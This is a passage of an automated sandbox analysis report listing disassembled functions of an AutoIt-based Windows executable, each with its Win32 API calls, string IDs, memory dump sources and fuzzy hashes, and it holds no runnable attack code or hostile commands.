                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00576F12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$AllocClearCopyString
                                                                                                                        • String ID: *jW
                                                                                                                        • API String ID: 2173805711-2693160286
                                                                                                                        • Opcode ID: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
                                                                                                                        • Instruction ID: 44ee51ad280366b0a565b4ed83e78f19bbb2caa039ebc39a47f9f52f1951dfdd
                                                                                                                        • Opcode Fuzzy Hash: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
                                                                                                                        • Instruction Fuzzy Hash: BB31B371604606DFDB04AF64F8949BD3F76FF85300B104898F9064B2A1D7309D91EBA4
                                                                                                                        Function 0059304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0059335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00593077,?,?), ref: 00593378
                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                                                                                        • _wcslen.LIBCMT ref: 0059309B
                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00593106
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                        • String ID: 255.255.255.255
                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                        • Opcode ID: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
                                                                                                                        • Instruction ID: b7988a32a94d354688cc7802369c09e2f709e1e9885909f3bd948fcabf683d35
                                                                                                                        • Opcode Fuzzy Hash: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
                                                                                                                        • Instruction Fuzzy Hash: 2A31B039600202DFCB20CF68C589AAA7FE0FF55318F248459E9158B3A2DB32EE45D760
                                                                                                                        Function 005A4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005A4705
                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005A4713
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005A471A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                        • String ID: msctls_updown32
                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                        • Opcode ID: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
                                                                                                                        • Instruction ID: c91d114d8811ffbe7e007e7097770fd6d48f963bac30f61831a6da48671c38db
                                                                                                                        • Opcode Fuzzy Hash: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
                                                                                                                        • Instruction Fuzzy Hash: E72151B5600249AFDB10DF68DCC5DBB3BADFB9B394B040459FA019B261DB70EC51DA60
                                                                                                                        Function 005795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                        • API String ID: 176396367-2734436370
                                                                                                                        • Opcode ID: 43ba29e6e5bae5d914dc9d1e1cb7a99fe7a18785f3e3b6bcea31d6be810b48cf
                                                                                                                        • Instruction ID: cd10c6d01f152332f5155d5cf581eff24f34541b12618ff2b35ce0a908ff0897
                                                                                                                        • Opcode Fuzzy Hash: 43ba29e6e5bae5d914dc9d1e1cb7a99fe7a18785f3e3b6bcea31d6be810b48cf
                                                                                                                        • Instruction Fuzzy Hash: 9921087210462266D331AA29AC06FBB7FACBFD5310F148426F94D97181EB51AD81E3F5
                                                                                                                        Function 005A37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005A3840
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005A3850
                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005A3876
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                        • Opcode ID: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
                                                                                                                        • Instruction ID: 16ab0d73d7ec5fdddcefd8e1ad1e02aa67a76108507ea7a7b151b4ba6b84a5f6
                                                                                                                        • Opcode Fuzzy Hash: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
                                                                                                                        • Instruction Fuzzy Hash: 3521BE72600219BBEB218F64CC85EBF3B6EFF8A754F108125F9009B190CA75DD528BA0
                                                                                                                        Function 0057223F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572258
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0057228A
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005722CA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 763830540-2594219639
                                                                                                                        • Opcode ID: 2f3efa7cce435c75fb6b18b1ee06b902171365d53b2fc8f855ad5007481d4600
                                                                                                                        • Instruction ID: 9e1159fe75dbbac9dd0ef8f7ec304e661fb2e9f376baa5e77a6b5d9479f045c6
                                                                                                                        • Opcode Fuzzy Hash: 2f3efa7cce435c75fb6b18b1ee06b902171365d53b2fc8f855ad5007481d4600
                                                                                                                        • Instruction Fuzzy Hash: 6921DA317002056BEF209B549D49EEE3FA9FB95710F048425FA09DB141EB70D945A7A2
                                                                                                                        Function 005849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00584A08
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00584A5C
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,005ACC08), ref: 00584AD0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                        • String ID: %lu
                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                        • Opcode ID: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
                                                                                                                        • Instruction ID: 0037eeb0ff125ed1899e4654c4d0db9e6e06dd6a80b791260e61ed13296bf692
                                                                                                                        • Opcode Fuzzy Hash: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
                                                                                                                        • Instruction Fuzzy Hash: C7314B75A00209AFDB10DF54C885EAA7FF9FF49308F1480A5E909EB252DB71EE45CB61
                                                                                                                        Function 00571B2C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00571B4F
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00571B61
                                                                                                                        • SendMessageW.USER32(?,0000000D,?,00000000), ref: 00571B99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 3e046d0da04dec33426f964713b66a5d1981b42b9b6b0fbd0c4380f80e85e692
                                                                                                                        • Instruction ID: b15c953f595a53e5585276f0438c956bc0dd7e644916e0abc7b8688a25c44554
                                                                                                                        • Opcode Fuzzy Hash: 3e046d0da04dec33426f964713b66a5d1981b42b9b6b0fbd0c4380f80e85e692
                                                                                                                        • Instruction Fuzzy Hash: 7821A431600519BFDB11DB9CE9419AEBBFDBF44340F10446AE109E7190DA71AE449B94
                                                                                                                        Function 00590CD5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000402,00000000,00000000), ref: 00590D24
                                                                                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00590D65
                                                                                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00590D8D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 18d14a03e0b7bd60b9f30443ab601934f51d46e23624566275145d10d23935b3
                                                                                                                        • Instruction ID: 6f49d8b782a9aa41e88af4dc1613f41679846ab11771eefa30ed008dacd51656
                                                                                                                        • Opcode Fuzzy Hash: 18d14a03e0b7bd60b9f30443ab601934f51d46e23624566275145d10d23935b3
                                                                                                                        • Instruction Fuzzy Hash: 03215C35200A01AFEB10EB68D985D6ABBE6FF59310B018855F9199B6B1DB30FC50DB90
                                                                                                                        Function 005A41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005A424F
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005A4264
                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005A4271
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                        • Opcode ID: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
                                                                                                                        • Instruction ID: 641ec9e6f322ed538e558a8222291f584a4bb7f2c0851ce90431f072bffea93b
                                                                                                                        • Opcode Fuzzy Hash: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
                                                                                                                        • Instruction Fuzzy Hash: 8011A331240248BEEF205E69CC46FAB3FACFFD6B54F110525FA55E6090D6B1DC519B50
                                                                                                                        Function 00572F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                          • Part of subcall function 00572DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
                                                                                                                          • Part of subcall function 00572DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
                                                                                                                          • Part of subcall function 00572DA7: GetCurrentThreadId.KERNEL32 ref: 00572DDD
                                                                                                                          • Part of subcall function 00572DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4
                                                                                                                        • GetFocus.USER32 ref: 00572F78
                                                                                                                          • Part of subcall function 00572DEE: GetParent.USER32(00000000), ref: 00572DF9
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00572FC3
                                                                                                                        • EnumChildWindows.USER32(?,0057303B), ref: 00572FEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                        • String ID: %s%d
                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                        • Opcode ID: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
                                                                                                                        • Instruction ID: 0284a40ecf1a234bd9a447240347ce344aa19da3ef18e3bce9d07fb704a45c16
                                                                                                                        • Opcode Fuzzy Hash: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
                                                                                                                        • Instruction Fuzzy Hash: 9D11A2716002066BDF14BF74AC89EED3F6ABFD5314F048075B90D9B292DE30994AAB60
                                                                                                                        Function 005A3429 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 005A34AB
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005A34BA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: @U=u$edit
                                                                                                                        • API String ID: 2978978980-590756393
                                                                                                                        • Opcode ID: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
                                                                                                                        • Instruction ID: 9d9a95a7db6a4abb988c022aa4904b02f30f53cebd6b163eaa9ec8997abdc26b
                                                                                                                        • Opcode Fuzzy Hash: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
                                                                                                                        • Instruction Fuzzy Hash: 52116D71500208AFEF118E64DC48AAF3F6AFB5A378F504724FA61971D0C771DC959B60
                                                                                                                        Function 00571BD8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00571C46
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                                                        • API String ID: 624084870-2258501812
                                                                                                                        • Opcode ID: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
                                                                                                                        • Instruction ID: 1ed53540a4fb225e058c0ca27bc0fbcb6ae22f75b40d3c3dadd142d70f95ccc8
                                                                                                                        • Opcode Fuzzy Hash: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
                                                                                                                        • Instruction Fuzzy Hash: 1401FC7164010566DB15E7D4D95A9FF7FACBF51340F200016A80A672C1EA209E08A6B5
                                                                                                                        Function 00571C5C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA
                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00571CC8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                                                        • API String ID: 624084870-2258501812
                                                                                                                        • Opcode ID: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
                                                                                                                        • Instruction ID: 8e6eb290ae1d6c6b4aab50148884e3fb06073902ca1ef74948d86ff6d13b0da8
                                                                                                                        • Opcode Fuzzy Hash: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
                                                                                                                        • Instruction Fuzzy Hash: CC012B7164051567DB15EBD8DA16AFE7FACBF51380F104016B84677281EA208F08E2B5
                                                                                                                        Function 005A5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58C1
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58EE
                                                                                                                        • DrawMenuBar.USER32(?), ref: 005A58FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
